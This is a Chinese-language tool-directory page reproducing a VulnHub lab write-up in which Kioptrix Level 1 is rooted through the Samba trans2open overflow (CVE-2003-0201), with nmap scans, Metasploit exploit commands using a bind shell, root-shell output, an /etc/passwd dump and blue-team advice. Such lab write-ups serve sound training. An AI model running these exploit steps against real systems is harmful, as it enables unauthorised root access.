Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
pentest-writeups — Kioptrix Level 1 解析 - CVE-2003-0201 Samba trans2open | Kitploit
工具/GitHubGitHub/americooo/pentest-writeups
权限提升侦察漏洞分析漏洞利用后渗透利用CTF渗透测试学习与教育实验室与实践
GitHubamericooo/pentest-writeups

pentest-writeups

Kioptrix Level 1 解析 - CVE-2003-0201 Samba trans2open

查看仓库
1个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

pentest-writeups

Kioptrix Level 1 渗透测试报告 - CVE-2003-0201 Samba trans2open

Kioptrix Level 1 — 渗透测试报告

作者: Amirbek Raxmatullayev (@americo_444)
日期: 2026-06-17
平台: VulnHub
难度: 入门
目标: 获取 root 权限


1. 环境搭建

组件详情
宿主机操作系统Ubuntu 26.04
虚拟机管理程序QEMU/KVM
目标Kioptrix Level 1 (VMDK)
攻击机 IP192.168.56.1
目标 IP192.168.56.101

注意: VirtualBox 与内核 7.0.0-22-generic 不兼容,原因是 DKMS KVM 命名空间冲突。改用 QEMU/KVM 并直接加载 VMDK,无需转换。

root@kitploit:~
qemu-system-x86_64 \
  -m 512 \
  -drive file="Kioptix Level 1.vmdk",format=vmdk \
  -netdev bridge,id=net0,br=virbr0 \
  -device e1000,netdev=net0 \
  -display gtk

2. 信息收集

2.1 主机发现

root@kitploit:~
nmap -sn 192.168.56.0/24

结果: 目标已确认位于 192.168.56.101

2.2 全端口与服务扫描

root@kitploit:~
nmap -sV -sC -p- 192.168.56.101

开放端口:

2.3 SMB 版本枚举

root@kitploit:~
msfconsole -q -x "use auxiliary/scanner/smb/smb_version; \
  set RHOSTS 192.168.56.101; run; exit"

结果: 确认为 Samba 2.2.1a — 已确认存在严重漏洞的版本。


3. 漏洞分析

CVE-2003-0201 — Samba trans2open 缓冲区溢出

描述:
Samba 2.2.x 版本的 trans2open 函数中存在基于栈的缓冲区溢出漏洞。未经身份验证的远程攻击者可利用该漏洞以 root 权限执行任意代码。

受影响版本: Samba 2.0.x — 2.2.8
CVSS 评分: 10.0(严重)
利用模块: exploit/linux/samba/trans2open


4. 漏洞利用

4.1 Metasploit 配置

root@kitploit:~
msfconsole
use exploit/linux/samba/trans2open
set RHOSTS 192.168.56.101
set LHOST 192.168.56.1
set PAYLOAD linux/x86/shell_bind_tcp
run

为什么使用 bind_tcp 而不是 reverse_tcp?
reverse_tcp 载荷失败的原因是 Kioptrix 虚拟机无法通过 NAT/桥接配置回连攻击机。使用 bind_tcp 时,由攻击机主动连接目标 — 目标机无需发起任何出站连接。

4.2 利用输出

root@kitploit:~
[*] Started bind TCP handler against 192.168.56.101:4444
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
...
[*] Command shell session 1 opened (192.168.56.1:36733 -> 192.168.56.101:4444)

成功获取 Shell! ✅


5. 后渗透

root@kitploit:~
whoami
# root

id
# uid=0(root) gid=0(root) groups=99(nobody)

hostname
# kioptrix.level1

uname -a
# Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# john:x:500:500::/home/john:/bin/bash
# harold:x:501:501::/home/harold:/bin/bash

系统信息:

  • 操作系统:Red Hat Linux,内核 2.4.7(构建于 2001 年)
  • 发现的本地用户:root、john、harold

6. 攻击链

root@kitploit:~
[Attacker: 192.168.56.1]
        |
        | Step 1: nmap full port scan
        v
[Target: 192.168.56.101]
        |
        | Step 2: Samba 2.2.1a identified
        v
[Metasploit — trans2open exploit]
        |
        | Step 3: Stack buffer overflow triggered
        v
[Bind shell opened on port 4444]
        |
        | Step 4: whoami = root
        v
[TARGET PWNED]

7. 要点总结

经验收获:

  • 在 VirtualBox 失败时使用 QEMU/KVM 搭建实验环境
  • 使用 nmap -sV -sC 进行服务指纹识别
  • 使用 Metasploit 辅助模块进行 SMB 枚举
  • 理解 CVE-2003-0201 — 栈缓冲区溢出原理
  • 区分 bind_tcp 与 reverse_tcp 载荷的差异及各自的适用场景

防御建议(蓝队):

  1. 将 Samba 升级至 3.x 或更高版本
  2. 通过防火墙限制 139/445 端口 — 仅允许可信内部主机访问
  3. 应用所有可用的操作系统和服务补丁
  4. 实施网络分段 — SMB 绝不应暴露在外部网络
  5. 部署 IDS/IPS 规则以检测针对 SMB 的缓冲区溢出尝试

8. 使用的工具

工具用途
nmap端口扫描、服务/版本检测
Metasploit FrameworkSMB 枚举、漏洞利用
QEMU/KVM实验室虚拟化
arp-scan主机发现

9. 参考资料

  • CVE-2003-0201 — NVD
  • Rapid7 — trans2open 模块
  • VulnHub — Kioptrix Level 1

作者:Amirbek Raxmatullayev | BEK Coders 安全研究 | 2026

下载工具
端口服务版本
22/tcpSSHOpenSSH 2.9p2
80/tcpHTTPApache 1.3.20
111/tcpRPCrpcbind 2
139/tcpSMBSamba 2.2.1a
443/tcpHTTPSmod_ssl/2.8.4
32768/tcpStatusRPC #100024